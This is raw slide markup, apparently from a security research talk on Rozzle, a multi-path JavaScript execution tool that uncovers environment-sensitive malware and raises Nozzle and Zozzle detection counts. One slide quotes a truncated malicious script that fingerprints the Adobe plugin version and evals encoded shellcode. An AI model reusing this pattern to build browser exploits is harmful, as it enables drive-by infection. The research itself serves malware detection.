                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t> to increase coverage</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean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648200" y="3886200"/>
              <a:ext cx="4114800" cy="1371600"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 1253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91440" tIns="91440" bIns="91440" rtlCol="0" anchor="ctr" anchorCtr="0"/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b="1" dirty="0"/>
                <a:t>Static analysis:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t> Retain much of runtime </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t>precision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" y="3608869"/>
            <a:ext cx="8305800" cy="1524002"/>
            <a:chOff x="457200" y="3886199"/>
            <a:chExt cx="8305800" cy="1371601"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3886199"/>
              <a:ext cx="4114800" cy="1371600"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 1253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1440" tIns="91440" bIns="91440" rtlCol="0" anchor="ctr" anchorCtr="0"/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400" dirty="0"/>
                <a:t>Branch on </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
                <a:t>environment-sensitive checks</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="457200" indent="-457200">
                <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t>No forking</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="457200" indent="-457200">
                <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t>No </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t>snapshotting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648200" y="3886200"/>
              <a:ext cx="4114800" cy="1371600"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 1253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1440" tIns="91440" bIns="91440" rtlCol="0" anchor="ctr" anchorCtr="0"/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b="1" dirty="0"/>
                <a:t>Symbolic execution:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t> re-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
                <a:t>verting</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t> to a previous state similar to running multiple browsers in </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t>parallel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800" dirty="0" smtClean="0"/>
              <a:t>Rozzle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219200"/>
            <a:ext cx="8305800" cy="969335"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2545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 anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Multi-path execution framework for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>JavaScript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2264735"/>
            <a:ext cx="8305800" cy="1219200"/>
            <a:chOff x="457200" y="2514600"/>
            <a:chExt cx="8305800" cy="1219200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rounded Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="2590800"/>
              <a:ext cx="4114800" cy="1143000"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 1253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91440" tIns="274320" bIns="91440" rtlCol="0" anchor="ctr" anchorCtr="0"/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400" dirty="0"/>
                <a:t>Multiple </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t>browser profiles on </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t>single </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t>machine</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="24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33399" y="2514600"/>
              <a:ext cx="1792651" cy="3200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What it is/does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648200" y="2590800"/>
              <a:ext cx="4114800" cy="1143000"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 1253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91440" tIns="274320" bIns="91440" rtlCol="0" anchor="ctr" anchorCtr="0"/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400" b="1" dirty="0"/>
                <a:t>Cluster of machines:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t> too resource consuming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24400" y="2514600"/>
              <a:ext cx="1752600" cy="3200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What it is </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>not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874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Multi-Execution in Rozzle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800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143000" y="1447800"/>
            <a:ext cx="7162800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00"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pP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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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script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6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adobe=new ActiveXObject(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‘AcroPDF.PDF’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pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pP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6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var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adobeVersion=adobe.GetVariable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‘$version’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if (navigator.userAgent.indexOf(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‘IE 7’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)&gt;=0 &amp;&amp;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    adobeVersion == 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’9.1.3’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)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{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean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        var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x=unescape(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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u4149%u1982%u90 […]’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  eval(x);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}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else if (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adobeVersion == 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’8.0.1’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)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     {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16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        var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x=unescape(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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‘%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean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u4073%u8279%u77 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0066FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[…]’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);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       eval(x);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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pP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  …</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:b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  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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/script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&gt;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28800" y="2286000"/>
            <a:ext cx="5562600" cy="3048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solidFill>
              <a:srgbClr val="C000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26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0.0333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3333 L 3.33333E-6 0.0777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7778 L -3.33333E-6 0.1888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8889 L 3.33333E-6 0.2333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3333 L -3.33333E-6 0.3055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0556 L 3.33333E-6 0.3888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8889 L 3.33333E-6 0.4333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3333 L -3.33333E-6 0.51111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990600" y="1447800"/>
            <a:ext cx="7086600" cy="4876800"/>
            <a:chOff x="990600" y="1447800"/>
            <a:chExt cx="7086600" cy="4876800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rounded Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="990600" y="1447800"/>
              <a:ext cx="7086600" cy="4876800"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 1253"/>
              </a:avLst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91440" bIns="91440" rtlCol="0" anchor="ctr" anchorCtr="0"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="6" name="Straight Connector 5"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="4" idx="0"/>
              <a:endCxn id="4" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4533900" y="1447800"/>
              <a:ext cx="0" cy="48768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4" idx="1"/>
              <a:endCxn id="4" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="990600" y="3886200"/>
              <a:ext cx="70866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990600" y="144322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/>
              <a:t>Consistent updates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>of variables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12" hidden="1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4533900" y="144322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/>
              <a:t>Handling loops</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13" hidden="1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="389506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/>
              <a:t>Indirect control flow: Exception handling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14" hidden="1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4539216" y="389506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600" dirty="0" smtClean="0"/>
              <a:t>I/O</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="36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2057400" y="3657600"/>
            <a:ext cx="5943600" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -31665"/>
              <a:gd name="adj2" fmla="val -66651"/>
              <a:gd name="adj3" fmla="val 1666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Introduce concept of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Symbolic Memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Multiple concrete values  associated with one variable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New JavaScript data type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Symbolic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3 subtypes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symbolic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>value /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>formula /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>conditional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Weak updates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>conditional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> assignments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Challenges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90600" y="1447800"/>
            <a:ext cx="7086600" cy="4876800"/>
            <a:chOff x="990600" y="1447800"/>
            <a:chExt cx="7086600" cy="4876800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rounded Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="990600" y="1447800"/>
              <a:ext cx="7086600" cy="4876800"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 1253"/>
              </a:avLst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91440" bIns="91440" rtlCol="0" anchor="ctr" anchorCtr="0"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="6" name="Straight Connector 5"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="4" idx="0"/>
              <a:endCxn id="4" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4533900" y="1447800"/>
              <a:ext cx="0" cy="48768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4" idx="1"/>
              <a:endCxn id="4" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="990600" y="3886200"/>
              <a:ext cx="70866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990600" y="144322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/>
              <a:t>Consistent updates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>of variables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33900" y="144322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/>
              <a:t>Handling loops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33900" y="389506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/>
              <a:t>Indirect control flow: Exception handling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389506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600" dirty="0" smtClean="0"/>
              <a:t>I/O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990600" y="144322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Consistent updates</a:t>
            </a:r>
          </a:p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of variables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33900" y="144322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Handling loops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3900" y="3895060"/>
            <a:ext cx="3543300" cy="24429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Indirect control flow: Exception handling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1066800" y="3657600"/>
            <a:ext cx="5943600" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 32557"/>
              <a:gd name="adj2" fmla="val -67959"/>
              <a:gd name="adj3" fmla="val 1666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Loop condition might be symbolic, number of iterations unknown!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1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Unroll </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> iterations (currently k=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1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/>
              <a:t>Instruction pointer checks (endless loops/recursion)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rounded Rectangular Callout 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="1524000"/>
            <a:ext cx="5943600" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 29337"/>
              <a:gd name="adj2" fmla="val 62419"/>
              <a:gd name="adj3" fmla="val 1666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2000" dirty="0" smtClean="0"/>
              <a:t>-blocks regularly used to test availability</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>of plugins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ActiveXObjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)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2000" dirty="0" smtClean="0"/>
              <a:t>-blocks set default values, cannot be ignored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Execute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2000" dirty="0" smtClean="0"/>
              <a:t>-statement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>similar to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2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>branch, add virtual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2000" dirty="0" smtClean="0"/>
              <a:t>-condition:  “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ActiveX supported</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>”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2057400" y="1524000"/>
            <a:ext cx="5943600" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -31128"/>
              <a:gd name="adj2" fmla="val 64163"/>
              <a:gd name="adj3" fmla="val 1666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Handling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>symbolic values when they are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buChar char="—"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… written to the DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buChar char="—"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… sent to a remote server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buChar char="—"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… executed (as part of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dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a: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i="1" dirty="0" smtClean="0"/>
              <a:t>Lazy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>evaluation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to concrete values (only when needed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0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Rozzle: Experiments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9600" y="1600200"/>
            <a:ext cx="7848600" cy="1295400"/>
            <a:chOff x="609600" y="1600200"/>
            <a:chExt cx="7848600" cy="1295400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1600200"/>
              <a:ext cx="7848600" cy="1295400"/>
              <a:chOff x="609600" y="1981200"/>
              <a:chExt cx="7848600" cy="12954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09600" y="1981200"/>
                <a:ext cx="7848600" cy="1295400"/>
                <a:chOff x="609600" y="1981200"/>
                <a:chExt cx="7848600" cy="1295400"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="5" name="Rounded Rectangle 4"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="609600" y="1981200"/>
                  <a:ext cx="7848600" cy="1295400"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst>
                    <a:gd name="adj" fmla="val 10101"/>
                  </a:avLst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" name="Straight Connector 3"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2133600" y="1981200"/>
                  <a:ext cx="0" cy="129540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8" name="Picture 4" descr="http://www.gensight.com/Project-Portfolio-Management/Images/Technology-Global-Architecture2.jpg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83250" y1="12333" x2="83250" y2="12333"/>
                            <a14:foregroundMark x1="87250" y1="20333" x2="87250" y2="20333"/>
                            <a14:foregroundMark x1="6000" y1="47667" x2="6000" y2="47667"/>
                            <a14:foregroundMark x1="4750" y1="45667" x2="4750" y2="45667"/>
                            <a14:foregroundMark x1="19500" y1="24333" x2="19500" y2="24333"/>
                            <a14:foregroundMark x1="21000" y1="26333" x2="21000" y2="26333"/>
                            <a14:foregroundMark x1="82750" y1="17667" x2="82750" y2="17667"/>
                            <a14:foregroundMark x1="82750" y1="7667" x2="82750" y2="7667"/>
                            <a14:foregroundMark x1="47250" y1="92333" x2="47250" y2="92333"/>
                            <a14:foregroundMark x1="13000" y1="73000" x2="13000" y2="73000"/>
                            <a14:foregroundMark x1="10500" y1="70667" x2="10500" y2="70667"/>
                            <a14:foregroundMark x1="54000" y1="22333" x2="54000" y2="22333"/>
                            <a14:foregroundMark x1="57500" y1="24333" x2="57500" y2="24333"/>
                            <a14:foregroundMark x1="38750" y1="17000" x2="38750" y2="17000"/>
                            <a14:foregroundMark x1="83250" y1="73000" x2="83250" y2="73000"/>
                            <a14:foregroundMark x1="84750" y1="46333" x2="84750" y2="46333"/>
                            <a14:foregroundMark x1="85250" y1="43333" x2="85250" y2="43333"/>
                            <a14:foregroundMark x1="79250" y1="73333" x2="79250" y2="73333"/>
                            <a14:foregroundMark x1="80750" y1="75667" x2="80750" y2="75667"/>
                            <a14:foregroundMark x1="46000" y1="90667" x2="46000" y2="90667"/>
                            <a14:foregroundMark x1="45000" y1="88000" x2="45000" y2="88000"/>
                            <a14:foregroundMark x1="46750" y1="85333" x2="46750" y2="85333"/>
                            <a14:foregroundMark x1="48250" y1="84333" x2="48250" y2="84333"/>
                            <a14:backgroundMark x1="22000" y1="7333" x2="22000" y2="7333"/>
                            <a14:backgroundMark x1="12500" y1="8333" x2="12500" y2="8333"/>
                            <a14:backgroundMark x1="10250" y1="20333" x2="9500" y2="20667"/>
                            <a14:backgroundMark x1="7500" y1="26333" x2="7500" y2="26333"/>
                            <a14:backgroundMark x1="5500" y1="19333" x2="5000" y2="18333"/>
                            <a14:backgroundMark x1="4250" y1="10333" x2="4250" y2="10333"/>
                            <a14:backgroundMark x1="14250" y1="9667" x2="14250" y2="9667"/>
                            <a14:backgroundMark x1="63500" y1="7667" x2="63500" y2="7667"/>
                            <a14:backgroundMark x1="26750" y1="33333" x2="26750" y2="33333"/>
                            <a14:backgroundMark x1="31250" y1="23667" x2="31250" y2="23667"/>
                            <a14:backgroundMark x1="23000" y1="36667" x2="23000" y2="36667"/>
                            <a14:backgroundMark x1="26250" y1="39667" x2="26250" y2="39667"/>
                            <a14:backgroundMark x1="28750" y1="40333" x2="28750" y2="40333"/>
                            <a14:backgroundMark x1="24750" y1="49333" x2="24750" y2="49333"/>
                            <a14:backgroundMark x1="26500" y1="53667" x2="26500" y2="53667"/>
                            <a14:backgroundMark x1="30250" y1="53667" x2="30250" y2="53667"/>
                            <a14:backgroundMark x1="38750" y1="60000" x2="38750" y2="60000"/>
                            <a14:backgroundMark x1="55750" y1="60667" x2="55750" y2="60667"/>
                            <a14:backgroundMark x1="67500" y1="37667" x2="67500" y2="37667"/>
                            <a14:backgroundMark x1="63000" y1="28000" x2="63000" y2="28000"/>
                            <a14:backgroundMark x1="84750" y1="55333" x2="84750" y2="55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405" y="2144675"/>
                <a:ext cx="1306033" cy="979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Rounded Rectangle 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2167270" y="1697399"/>
              <a:ext cx="1414130" cy="3200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Offline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86200" y="1600200"/>
            <a:ext cx="4572000" cy="1295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Controlled Experiment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7x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> more Nozzle detections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9600" y="3238500"/>
            <a:ext cx="7848600" cy="1295400"/>
            <a:chOff x="609600" y="3238500"/>
            <a:chExt cx="7848600" cy="1295400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12" name="Group 11"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="609600" y="3238500"/>
              <a:ext cx="7848600" cy="1295400"/>
              <a:chOff x="609600" y="3733800"/>
              <a:chExt cx="7848600" cy="129540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09600" y="3733800"/>
                <a:ext cx="7848600" cy="1295400"/>
                <a:chOff x="609600" y="1981200"/>
                <a:chExt cx="7848600" cy="1295400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609600" y="1981200"/>
                  <a:ext cx="7848600" cy="1295400"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst>
                    <a:gd name="adj" fmla="val 10101"/>
                  </a:avLst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133600" y="1981200"/>
                  <a:ext cx="0" cy="1295400"/>
                </a:xfrm>
                <a:prstGeom prst="lin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</p:cxnSp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1030" name="Picture 6" descr="http://icons.iconarchive.com/icons/rimshotdesign/nod/128/Network-File-Server-Disconnected-alt-icon.png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971" y="3829049"/>
                <a:ext cx="1104900" cy="1104901"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst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pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Rounded Rectangle 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2167270" y="3333749"/>
              <a:ext cx="1414130" cy="32004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Online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886200" y="3238499"/>
            <a:ext cx="4572000" cy="1295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Similar to Bing crawling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Almost </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>4x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Nozzle detections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/>
              <a:t>10.1%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> more Zozzle detections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09600" y="4876800"/>
            <a:ext cx="7848600" cy="1295400"/>
            <a:chOff x="609600" y="4876800"/>
            <a:chExt cx="7848600" cy="1295400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="14" name="Group 13"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="609600" y="4876800"/>
              <a:ext cx="7848600" cy="1295400"/>
              <a:chOff x="609600" y="5132867"/>
              <a:chExt cx="7848600" cy="12954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09600" y="5132867"/>
                <a:ext cx="7848600" cy="1295400"/>
                <a:chOff x="609600" y="1981200"/>
                <a:chExt cx="7848600" cy="1295400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609600" y="1981200"/>
                  <a:ext cx="7848600" cy="1295400"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst>
                    <a:gd name="adj" fmla="val 10101"/>
                  </a:avLst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133600" y="1981200"/>
                  <a:ext cx="0" cy="1295400"/>
                </a:xfrm>
                <a:prstGeom prst="line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</p:cxnSp>
